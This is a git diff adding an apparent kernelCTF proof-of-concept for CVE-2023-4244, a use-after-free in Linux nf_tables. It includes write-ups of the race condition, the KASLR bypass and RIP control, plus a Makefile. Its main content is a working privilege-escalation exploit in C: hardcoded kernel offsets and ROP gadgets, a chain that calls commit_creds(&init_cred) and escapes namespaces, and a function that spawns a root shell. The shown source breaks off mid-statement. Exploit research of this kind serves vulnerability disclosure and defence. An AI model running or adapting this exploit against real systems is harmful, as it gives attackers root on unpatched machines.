diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/exploit.md new file mode 100644 index 00000000..1ad62146 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/exploit.md @@ -0,0 +1,270 @@ +# Overview + +The vulnerability is caused by a race condition between the control plane and GC. + +```c +static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set) +{ + int err; + + err = nft_trans_set_add(ctx, NFT_MSG_DELSET, set); + if (err < 0) + return err; + + if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT)) + nft_map_deactivate(ctx, set); // [1] + + nft_deactivate_next(ctx->net, set); + nft_use_dec(&ctx->table->use); + + return err; +} +``` + +Deleting an nft_set deactivates its set elements in `nft_delset` [1]. + +```c +static void nft_rbtree_gc(struct work_struct *work) +{ + struct nft_rbtree_elem *rbe, *rbe_end = NULL, *rbe_prev = NULL; + struct nft_set_gc_batch *gcb = NULL; + struct nft_rbtree *priv; + struct rb_node *node; + struct nft_set *set; + struct net *net; + u8 genmask; + + priv = container_of(work, struct nft_rbtree, gc_work.work); + set = nft_set_container_of(priv); + net = read_pnet(&set->net); + genmask = nft_genmask_cur(net); + + write_lock_bh(&priv->lock); + write_seqcount_begin(&priv->count); + for (node = rb_first(&priv->root); node != NULL; node = rb_next(node)) { + rbe = rb_entry(node, struct nft_rbtree_elem, node); + + if (!nft_set_elem_active(&rbe->ext, genmask)) + continue; + + /* elements are reversed in the rbtree for historical reasons, + * from highest to lowest value, that is why end element is + * always visited before the start element. + */ + if (nft_rbtree_interval_end(rbe)) { + rbe_end = rbe; + continue; + } + if (!nft_set_elem_expired(&rbe->ext)) + continue; + + if (nft_set_elem_mark_busy(&rbe->ext)) { + rbe_end = NULL; + continue; + } + + if (rbe_prev) { + rb_erase(&rbe_prev->node, &priv->root); + rbe_prev = NULL; + } + gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC); + if (!gcb) + break; + + atomic_dec(&set->nelems); + nft_set_gc_batch_add(gcb, rbe); // [2] + rbe_prev = rbe; + + if (rbe_end) { + atomic_dec(&set->nelems); + nft_set_gc_batch_add(gcb, rbe_end); + rb_erase(&rbe_end->node, &priv->root); + rbe_end = NULL; + } + node = rb_next(node); + if (!node) + break; + } + if (rbe_prev) + rb_erase(&rbe_prev->node, &priv->root); + write_seqcount_end(&priv->count); + write_unlock_bh(&priv->lock); + + rbe = nft_set_catchall_gc(set); + if (rbe) { + gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC); + if (gcb) + nft_set_gc_batch_add(gcb, rbe); + } + nft_set_gc_batch_complete(gcb); // [3] + + queue_delayed_work(system_power_efficient_wq, &priv->gc_work, + nft_set_gc_interval(set)); +} +``` + +If the set's GC worker, `nft_rbtree_gc`, runs at the same time, it adds the expired elements to the GC batch [2] and then calls `nft_set_gc_batch_complete` to release them [3]. As a result, an element that the control plane has already deactivated is released once more by the GC, so every reference the element holds is dropped twice. This double release is the vulnerability. + +We can turn this vulnerability into a UAF as follows. First, we create a victim set and a victim chain, and add an immediate expr pointing to the victim chain; this is the pointer we will later leave dangling. At this point, the victim chain's reference count (`nft_chain->use`) is 1. Then, we add a set element with a short timeout to the victim set, whose verdict also points to the victim chain. Now, the reference count of the victim chain becomes 2.
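+ +In nft(8) syntax, the state built so far looks roughly like this (illustrative only; the exploit drives the same operations directly over netlink with libnftnl, and the key type here is simplified relative to the PoC's 12-byte key): + +``` +add table ip table1 +add chain ip table1 chain_rop # victim chain +add chain ip table1 chain1 { type filter hook input priority 10 ; } +add rule ip table1 chain1 goto chain_rop # immediate expr: chain_rop->use = 1 +add map ip table1 set_rop { type ipv4_addr : verdict ; flags interval,timeout ; gc-interval 1s ; } +add element ip table1 set_rop { 10.0.0.1 timeout 1s : goto chain_rop } # element verdict: chain_rop->use = 2 +```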
+Next, we delete the set to trigger the vulnerability. When the race hits, the victim chain's reference count is decremented twice, down to zero. Since the reference count is now zero, the chain can be freed. As a result, the immediate expr is left with a dangling pointer to the freed victim chain. + +# KASLR Bypass and Information Leak + +We used a timing side channel attack to leak the kernel base, and we placed a fake ops structure in the non-randomized CPU entry area (CVE-2023-0597), so no heap address leak is required. + +# RIP Control + +```c +struct nft_chain { + struct nft_rule_blob __rcu *blob_gen_0; + struct nft_rule_blob __rcu *blob_gen_1; + struct list_head rules; + struct list_head list; + struct rhlist_head rhlhead; + struct nft_table *table; + u64 handle; + u32 use; + u8 flags:5, + bound:1, + genmask:2; + char *name; + u16 udlen; + u8 *udata; + + /* Only used during control plane commit phase: */ + struct nft_rule_blob *blob_next; +}; +``` + +When the vulnerability is triggered, the freed chain's `blob_gen_0` can still be reached through the immediate expr. We leave the chain freed and spray objects so that a fake blob ends up at `blob_gen_0`. + +```c +unsigned int +nft_do_chain(struct nft_pktinfo *pkt, void *priv) +{ + ... +do_chain: + if (genbit) + blob = rcu_dereference(chain->blob_gen_1); + else + blob = rcu_dereference(chain->blob_gen_0); + + rule = (struct nft_rule_dp *)blob->data; + last_rule = (void *)blob->data + blob->size; +next_rule: + regs.verdict.code = NFT_CONTINUE; + for (; rule < last_rule; rule = nft_rule_next(rule)) { + nft_rule_dp_for_each_expr(expr, last, rule) { + if (expr->ops == &nft_cmp_fast_ops) + nft_cmp_fast_eval(expr, &regs); + else if (expr->ops == &nft_cmp16_fast_ops) + nft_cmp16_fast_eval(expr, &regs); + else if (expr->ops == &nft_bitwise_fast_ops) + nft_bitwise_fast_eval(expr, &regs); + else if (expr->ops != &nft_payload_fast_ops || + !nft_payload_fast_eval(expr, &regs, pkt)) + expr_call_ops_eval(expr, &regs, pkt); + + if (regs.verdict.code != NFT_CONTINUE) + break; + } +``` + +```c +static void expr_call_ops_eval(const struct nft_expr *expr, + struct nft_regs *regs, + struct nft_pktinfo *pkt) +{ +#ifdef CONFIG_RETPOLINE + unsigned long e = (unsigned long)expr->ops->eval; +#define X(e, fun) \ + do { if ((e) == (unsigned long)(fun)) \ + return fun(expr, regs, pkt); } while (0) + + X(e, nft_payload_eval); + X(e, nft_cmp_eval); + X(e, nft_counter_eval); + X(e, nft_meta_get_eval); + X(e, nft_lookup_eval); + X(e, nft_range_eval); + X(e, nft_immediate_eval); + X(e, nft_byteorder_eval); + X(e, nft_dynset_eval); + X(e, nft_rt_get_eval); + X(e, nft_bitwise_eval); +#undef X +#endif /* CONFIG_RETPOLINE */ + expr->ops->eval(expr, regs, pkt); +} +``` + +`chain->blob_gen_0` is dereferenced in `nft_do_chain`, and `expr->ops->eval` is called in `expr_call_ops_eval` to evaluate each expression. We point the ops of the fake expr into the CPU entry area to control RIP. We make the fake blob object larger than 0x2000 bytes so that it is served by the page allocator rather than a slab cache. + +# Post-RIP + +The ROP payload is stored in `chain->blob_gen_0`, which is allocated by the page allocator. + +When `eval()` is called, `RBX` points to `chain->blob_gen_0+0x10`, which is the beginning of the `nft_expr` structure.
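+ +Concretely, the first quadwords of the sprayed blob do double duty as blob header, fake `expr->ops` and ROP stack. A sketch of the layout (reconstructed from `rop_chain()` below and the gadget comments in exploit.c): + +```c +/* + * data[0] = 0x100 fake blob header: size > 0 + * data[1] = 0x100 fake rule header: dlen > 0, so the expr walk runs + * data[2] = fake ops the expr begins at blob+0x10, so this quadword is read as + * expr->ops; it points into the CPU entry area, whose eval slot + * holds the PUSH_RBX_POP_RSP pivot gadget + * data[3..] = ROP chain RBX == expr, so "push rbx ; pop rsp ; pop rbp" leaves rsp at + * &data[3], where the chain below takes over + */ +```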
+ +```c +void rop_chain(uint64_t* data){ + int i = 0; + + // nft_rule_blob.size > 0 + data[i++] = 0x100; + // nft_rule_blob.dlen > 0 + data[i++] = 0x100; + + // fake ops addr + data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval); + + // current = find_task_by_vpid(getpid()) + data[i++] = kbase + POP_RDI_RET; + data[i++] = getpid(); + data[i++] = kbase + FIND_TASK_BY_VPID; + + // current += offsetof(struct task_struct, rcu_read_lock_nesting) + data[i++] = kbase + POP_RSI_RET; + data[i++] = RCU_READ_LOCK_NESTING_OFF; + data[i++] = kbase + ADD_RAX_RSI_RET; + + // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section) + data[i++] = kbase + POP_RCX_RET; + data[i++] = 0; + data[i++] = kbase + MOV_RAX_RCX_RET; + + // Bypass "schedule while atomic": set oops_in_progress = 1 + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + OOPS_IN_PROGRESS; + data[i++] = kbase + MOV_RSI_RDI_RET; + + // commit_creds(&init_cred) + data[i++] = kbase + POP_RDI_RET; + data[i++] = kbase + INIT_CRED; + data[i++] = kbase + COMMIT_CREDS; + + // find_task_by_vpid(1) + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + FIND_TASK_BY_VPID; + + data[i++] = kbase + POP_RSI_RET; + data[i++] = 0; + + // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) + data[i++] = kbase + MOV_RDI_RAX_RET; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + INIT_NSPROXY; + data[i++] = kbase + SWITCH_TASK_NAMESPACES; + + data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE; + data[i++] = 0; + data[i++] = 0; + data[i++] = _user_rip; + data[i++] = _user_cs; + data[i++] = _user_rflags; + data[i++] = _user_sp; + data[i++] = _user_ss; +} +``` \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/vulnerability.md new file mode 100644 index 00000000..76b71b5f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/vulnerability.md @@ -0,0 +1,12 @@ +- Requirements: + - Capabilities: CAP_NET_ADMIN + - Kernel configuration: CONFIG_NETFILTER, CONFIG_NF_TABLES + - User namespaces required: Yes +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cfed7e1b1f8e (netfilter: nf_tables: add set garbage collection helpers) +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5f68718b34a531a556f2f50300ead2862278da26 (netfilter: nf_tables: GC transaction API to avoid race with control plane) +- Affected Version: v6.4 - v6.5-rc5 +- Affected Component: net/netfilter +- Cause: Use-After-Free +- Syscall to disable: disallow unprivileged user namespaces +- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4244 +- Description: A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. Due to a race condition between nf_tables netlink control plane transaction and nft_set element garbage collection, it is possible to underflow the reference counter causing a use-after-free vulnerability. We recommend upgrading past commit 3e91b0ebd994635df2346353322ac51ce84ce6d8.
\ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/Makefile b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/Makefile new file mode 100644 index 00000000..f838f98d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/Makefile @@ -0,0 +1,35 @@ +LIBMNL_DIR = $(realpath ./)/libmnl_build +LIBNFTNL_DIR = $(realpath ./)/libnftnl_build + +exploit: + gcc -o exploit exploit.c -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include -static -s + +prerequisites: libmnl-build libnftnl-build + +libmnl-build : libmnl-download + tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2 + cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install` + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install + +libnftnl-build : libmnl-build libnftnl-download + tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz + cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install` + cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make + cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install + +libmnl-download : + mkdir $(LIBMNL_DIR) + wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2 + +libnftnl-download : + mkdir $(LIBNFTNL_DIR) + wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz + +run: + ./exploit + +clean: + rm -rf $(LIBMNL_DIR) + rm -rf $(LIBNFTNL_DIR) + rm -f exploit diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit new file mode 100755 index 00000000..75975cd3 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit.c b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit.c new file mode 100644 index 00000000..0065cb9a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit.c @@ -0,0 +1,847 @@ +#define _GNU_SOURCE + +/* Header names below were lost in extraction; reconstructed from the calls this file makes. */ +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <stdint.h> +#include <stddef.h> +#include <unistd.h> +#include <fcntl.h> +#include <sched.h> +#include <signal.h> +#include <err.h> +#include <net/if.h> +#include <sys/socket.h> + +#include <netinet/in.h> +#include <arpa/inet.h> +#include <linux/rtnetlink.h> +#include <linux/netfilter.h> +#include <linux/netfilter/nf_tables.h> + +#include <libmnl/libmnl.h> +#include <libnftnl/table.h> +#include <libnftnl/chain.h> +#include <libnftnl/rule.h> +#include <libnftnl/expr.h> +#include <libnftnl/set.h> + +#include "netlink_utils.h" + +#define BUF_SIZE 0x1000 * 0x100 + +#define FIND_TASK_BY_VPID 0x1bbe60 +#define SWITCH_TASK_NAMESPACES 0x1c3a30 +#define COMMIT_CREDS 0x1c55a0 +#define INIT_CRED 0x2876960 +#define INIT_NSPROXY 0x2876720 +#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0x1201146 +#define OOPS_IN_PROGRESS 0x3444338 +#define RCU_READ_LOCK_NESTING_OFF 0x474 + +#define PUSH_RBX_POP_RSP 0xf89a31 // 0xffffffff81f89a31 : push rbx ; and byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; jmp 0xffffffff82404c80 +#define POP_RDI_RET 0x0e89fe // 0xffffffff810e89fe : pop rdi ; jmp 0xffffffff82404c80 +#define POP_RSI_RET 0x0e8a70 // 0xffffffff810e8a70 : pop rsi ; jmp 0xffffffff82404c80 +#define ADD_RAX_RSI_RET 0x038160 //
0xffffffff81038160 : add rax, rsi ; jmp 0xffffffff82404c80 +#define POP_RCX_RET 0x11581f6 // 0xffffffff821581f6 : pop rcx ; jmp 0xffffffff82404c80 +#define MOV_RAX_RCX_RET 0x72718b // 0xffffffff8172718b : mov qword ptr [rax], rcx ; jmp 0xffffffff82404c80 +#define MOV_RDI_RAX_RET 0x1f4605 // 0xffffffff811f4605 : mov rdi, rax ; test esi, esi ; jne 0xffffffff811f45b4 ; jmp 0xffffffff82404c80 +#define POP_RSP_RET 0x008999 // 0xffffffff81008999 : pop rsp ; jmp 0xffffffff82404c80 +#define MOV_RSI_RDI_RET 0x2fcc79 // 0xffffffff812fcc79 : mov qword ptr [rsi], rdi ; jmp 0xffffffff82404c80 + +uint64_t kbase = 0; + +char* buf; +struct nlmsghdr * nlh; +struct mnl_nlmsg_batch * batch; +struct mnl_socket * nl; +uint32_t portid; +uint8_t family = NFPROTO_IPV4; +int seq = 0; + +char * table1_name = "table1"; +char * set_rop_name = "set_rop"; +char * chain_base_name = "chain1"; +char * chain_rop_name = "chain_rop"; + +size_t KERNEL_BASE = 0; + +void win(){ + setns(open("/proc/1/ns/mnt", O_RDONLY), 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + char* shell[] = { + "/bin/sh", + NULL, + }; + + execve(shell[0], shell, NULL); + + while(1); +} + +void set_affinity(int cpuid){ + cpu_set_t my_set; + int cpu_cores = sysconf(_SC_NPROCESSORS_ONLN); + + if (cpu_cores == 1) return; + + CPU_ZERO(&my_set); + + CPU_SET(cpuid, &my_set); + + if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { + perror("[-] sched_setaffinity()"); + exit(EXIT_FAILURE); + } +} + +/* +* Add a network interface. +* Equivalent to `ip link add ...`. +*/ +int net_if(char *type, int n, int opt) { + + struct nlmsghdr *msg; + struct nlattr *opts; + struct ifinfomsg ifinfo = {}; + char name[0x100] = { 0 }; + int sk; + + strcpy(name, type); + + if (n >= 0) + snprintf(name, sizeof(name), "%s-%d", type, n); + + // Initialize a netlink socket and allocate a nlmsghdr + sk = nl_init_request(RTM_NEWLINK, &msg, NLM_F_REQUEST|NLM_F_CREATE); + if (!sk) { + perror("nl_init_request()"); + return -1; + } + + ifinfo.ifi_family = AF_UNSPEC; + ifinfo.ifi_type = PF_NETROM; + ifinfo.ifi_index = 0; + ifinfo.ifi_flags = opt; + ifinfo.ifi_change = 1; + + nlmsg_append(msg, &ifinfo, sizeof(ifinfo), NLMSG_ALIGNTO); + + nla_put_string(msg, IFLA_IFNAME, name); + opts = nla_nest_start(msg, IFLA_LINKINFO); + nla_put_string(msg, IFLA_INFO_KIND, type); + nla_nest_end(msg, opts); + + // Send the netlink message and deallocate resources + return nl_complete_request(sk, msg); +} + +void write_file(const char *filename, char *text) { + int fd = open(filename, O_RDWR | O_CREAT, 0600); + + write(fd, text, strlen(text)); + close(fd); +} + +void new_ns(void) { + uid_t uid = getuid(); + gid_t gid = getgid(); + char buffer[0x100]; + + unshare(CLONE_NEWUSER | CLONE_NEWNS); + + unshare(CLONE_NEWNET); + + write_file("/proc/self/setgroups", "deny"); + + snprintf(buffer, sizeof(buffer), "0 %d 1", uid); + write_file("/proc/self/uid_map", buffer); + snprintf(buffer, sizeof(buffer), "0 %d 1", gid); + write_file("/proc/self/gid_map", buffer); + + net_if("lo", -1, IFF_UP); +} + +uint64_t _user_rip = (uint64_t) win; +uint64_t _user_cs = 0; +uint64_t _user_rflags = 0; +uint64_t _user_sp = 0; +uint64_t _user_ss = 0; + +void save_state(void) { + __asm__(".intel_syntax noprefix;" + "mov _user_cs, cs;" + "mov _user_ss, ss;" + "mov _user_sp, rsp;" + "pushf;" + "pop _user_rflags;" + ".att_syntax"); + return; +} + +#define TRIG_HOST "127.0.0.1" +#define TRIG_PORT 1337 + +/* Connect to a server on a specific port to trigger netfilter hooks */ +void 
trig_net_sock(void) { + int sockfd = 00; + struct sockaddr_in servaddr, cli; + + bzero(&servaddr, sizeof(servaddr)); + bzero(&cli, sizeof(cli)); + + sockfd = socket(AF_INET, SOCK_STREAM, 0); + if(sockfd == -1) + printf("[-] Socket creation failed"); + + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = inet_addr(TRIG_HOST); + servaddr.sin_port = htons(TRIG_PORT); + + if(connect(sockfd, (struct sockaddr*) &servaddr, sizeof(servaddr)) != 0) + printf("[-] Connection with server failed"); + + write(sockfd, "AAAA", 4); + + close(sockfd); + + return; +} + +/* Set up a server to receive hook-triggering output packets */ +void setup_trig_server(void) { + int sfd = 0, sock = 0; + struct sockaddr_in address; + int opt = 1; + int addrlen = sizeof(address); + char buffer[1024] = { 0 }; + + if((sfd = socket(AF_INET, SOCK_STREAM, 0)) == 0) + printf("[-] Error at socket()"); + + if(setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR | SO_REUSEPORT, &opt, sizeof(opt))) + printf("[-] Error at setsockopt()"); + + address.sin_family = AF_INET; + address.sin_addr.s_addr = INADDR_ANY; + address.sin_port = htons(TRIG_PORT); + + if(bind(sfd, (struct sockaddr*)&address, sizeof(address)) < 0) + printf("[-] Error at bind()"); + + if(listen(sfd, 3) < 0) + printf("[-] Error at listen()"); + + if((sock = accept(sfd, (struct sockaddr*)&address, (socklen_t*)&addrlen)) < 0) + printf("[-] Error at accept()"); + + read(sock, buffer, 4); + + close(sock); + close(sfd); + + return; +} + +void trig_sock(){ + int sfd = 0; + + /* Set up server at TRIG_PORT in a new process */ + sfd = fork(); + if(sfd == 0) { + setup_trig_server(); + exit(0); + } + + /* Trigger the network hook */ + trig_net_sock(); +} + +// CPU entry area pointers. We prepare some memory here that will be referenced +// by the ROP chains. 
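+// The payload is planted in the (non-randomized, CVE-2023-0597) CPU entry area +// exception stack by write_cpu_entry_area() below, which loads attacker-controlled +// register values and then takes a fault, spilling them at a fixed address.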
+// We need: +// - the struct nft_expr_ops { .eval } member +#define CPU_ENTRY_AREA_BASE(cpu) (0xfffffe0000001000ull + (uint64_t)cpu * 0x3b000) +#define PAYLOAD_LOCATION(cpu) (CPU_ENTRY_AREA_BASE(cpu) + 0x1f58) + +struct cpu_entry_area_payload { +union { + struct { + // function to call to evaluate the expression + uint64_t nft_expr_eval; + }; + uint64_t regs[16]; +}; +}; + +void rop_chain(uint64_t* data){ + int i = 0; + + // nft_rule_blob.size > 0 + data[i++] = 0x100; + // nft_rule_blob.dlen > 0 + data[i++] = 0x100; + + // fake ops addr + data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval); + + // current = find_task_by_vpid(getpid()) + data[i++] = kbase + POP_RDI_RET; + + data[i++] = getpid(); + data[i++] = kbase + FIND_TASK_BY_VPID; + + // current += offsetof(struct task_struct, rcu_read_lock_nesting) + data[i++] = kbase + POP_RSI_RET; + data[i++] = RCU_READ_LOCK_NESTING_OFF; + data[i++] = kbase + ADD_RAX_RSI_RET; + + // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section) + data[i++] = kbase + POP_RCX_RET; + data[i++] = 0; + data[i++] = kbase + MOV_RAX_RCX_RET; + + // Bypass "schedule while atomic": set oops_in_progress = 1 + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + OOPS_IN_PROGRESS; + data[i++] = kbase + MOV_RSI_RDI_RET; + + // commit_creds(&init_cred) + data[i++] = kbase + POP_RDI_RET; + data[i++] = kbase + INIT_CRED; + data[i++] = kbase + COMMIT_CREDS; + + // find_task_by_vpid(1) + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + FIND_TASK_BY_VPID; + + data[i++] = kbase + POP_RSI_RET; + data[i++] = 0; + + // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) + data[i++] = kbase + MOV_RDI_RAX_RET; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + INIT_NSPROXY; + data[i++] = kbase + SWITCH_TASK_NAMESPACES; + + data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE; + data[i++] = 0; + data[i++] = 0; + data[i++] = _user_rip; + data[i++] = _user_cs; + data[i++] = _user_rflags; + data[i++] = _user_sp; + data[i++] = _user_ss; +} + +void setup_table_chain(){ + struct nftnl_table * table = nftnl_table_alloc(); + nftnl_table_set_str(table, NFTNL_TABLE_NAME, table1_name); + nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0); + + struct nftnl_chain * chain1 = nftnl_chain_alloc(); + nftnl_chain_set_str(chain1, NFTNL_CHAIN_TABLE, table1_name); + nftnl_chain_set_str(chain1, NFTNL_CHAIN_NAME, chain_base_name); + nftnl_chain_set_u32(chain1, NFTNL_CHAIN_FLAGS, 0); + nftnl_chain_set_str(chain1, NFTNL_CHAIN_TYPE, "filter"); + nftnl_chain_set_u32(chain1, NFTNL_CHAIN_HOOKNUM, NF_INET_LOCAL_IN); + nftnl_chain_set_u32(chain1, NFTNL_CHAIN_PRIO, 10); + nftnl_chain_set_u32(chain1, NFTNL_CHAIN_POLICY, NF_ACCEPT); + + struct nftnl_chain * chain_rop = nftnl_chain_alloc(); + nftnl_chain_set_str(chain_rop, NFTNL_CHAIN_TABLE, table1_name); + nftnl_chain_set_str(chain_rop, NFTNL_CHAIN_NAME, chain_rop_name); + + struct nftnl_rule * rule_dangling_4 = nftnl_rule_alloc(); + + nftnl_rule_set_str(rule_dangling_4, NFTNL_RULE_TABLE, table1_name); + nftnl_rule_set_str(rule_dangling_4, NFTNL_RULE_CHAIN, chain_base_name); + + struct nftnl_expr * expr_immediate = nftnl_expr_alloc("immediate"); + nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT); + nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO); + nftnl_expr_set_str(expr_immediate, NFTNL_EXPR_IMM_CHAIN, chain_rop_name); + nftnl_rule_add_expr(rule_dangling_4, expr_immediate); + 
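/* First batch: create table1 by itself. A second batch then creates chain_rop, the base chain hooked at NF_INET_LOCAL_IN, and the rule whose immediate "goto chain_rop" verdict holds the chain reference that will later be left dangling. */ + 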
+ batch = mnl_nlmsg_batch_start(buf, BUF_SIZE); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE, seq++); + nftnl_table_nlmsg_build_payload(nlh, table); + mnl_nlmsg_batch_next(batch); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "mnl_socket_send"); + } + + batch = mnl_nlmsg_batch_start(buf, BUF_SIZE); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE, seq++); + nftnl_chain_nlmsg_build_payload(nlh, chain_rop); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE, seq++); + nftnl_chain_nlmsg_build_payload(nlh, chain1); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++); + nftnl_rule_nlmsg_build_payload(nlh, rule_dangling_4); + mnl_nlmsg_batch_next(batch); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "mnl_socket_send"); + } +} + +void del_chain(char* chain_name){ + struct nftnl_chain * chain = nftnl_chain_alloc(); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, table1_name); + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + nftnl_chain_set_u32(chain, NFTNL_CHAIN_FLAGS, 0); + + batch = mnl_nlmsg_batch_start(buf, BUF_SIZE); + + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELCHAIN, family, 0, seq++); + nftnl_chain_nlmsg_build_payload(nlh, chain); + mnl_nlmsg_batch_next(batch); + + nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++); + mnl_nlmsg_batch_next(batch); + + if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) { + err(1, "mnl_socket_send"); + } +} + +void trigger(char * trig_set_name, char * trig_chain_name){ + uint32_t key_size = 0xc; + + struct nftnl_set * set = nftnl_set_alloc(); + + nftnl_set_set_str(set, NFTNL_SET_TABLE, table1_name); + nftnl_set_set_str(set, NFTNL_SET_NAME, trig_set_name); + nftnl_set_set_u32(set, NFTNL_SET_FLAGS, NFT_SET_INTERVAL | NFT_SET_TIMEOUT | NFT_SET_MAP); + nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, key_size); + nftnl_set_set_u32(set, NFTNL_SET_ID, 1337); + nftnl_set_set_u32(set, NFTNL_SET_GC_INTERVAL, 1); + nftnl_set_set_u32(set, NFTNL_SET_DATA_TYPE, NFT_DATA_VERDICT); + + uint8_t key_data[0x200] = {0,}; + uint8_t key_end_data[0x2000] = {0,}; + + unsigned long user_data[0x100] = {0,}; + + struct nftnl_set * set_elem_trigger = nftnl_set_alloc(); + + nftnl_set_set_str(set_elem_trigger, NFTNL_SET_TABLE, 